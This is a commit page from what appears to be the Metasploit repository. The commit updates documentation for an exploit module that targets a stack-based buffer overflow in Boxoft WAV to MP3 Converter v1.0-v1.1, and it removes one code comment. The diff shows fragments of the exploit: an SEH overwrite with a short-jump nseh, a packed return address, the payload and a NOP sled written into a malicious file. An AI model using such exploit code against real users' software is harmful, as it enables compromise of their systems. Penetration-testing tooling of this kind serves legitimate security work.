added target versions to documentation

GSoC/Meterpreter_Web_Console
Shelby Pace 2018-07-02 09:20:17 -05:00
parent 3b5555542c
commit 54fce378fa
No known key found for this signature in database
GPG Key ID: B2F3A8B476406857
2 changed files with 2 additions and 2 deletions

View File

@ -1,7 +1,7 @@
## Vulnerable Application
This module exploits a stack-based buffer overflow in Boxoft WAV to MP3 Converter.
This module exploits a stack-based buffer overflow in Boxoft WAV to MP3 Converter v1.0-v1.1.
## Verification Steps

View File

@ -55,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
buf << "\xeb\x06\x90\x90" # nseh -- jump to shellcode
buf << [target.ret].pack("V*") # seh
buf << file_payload
buf << make_fast_nops(5860) # end of shellcode
buf << make_fast_nops(5860)
file_create(buf)
end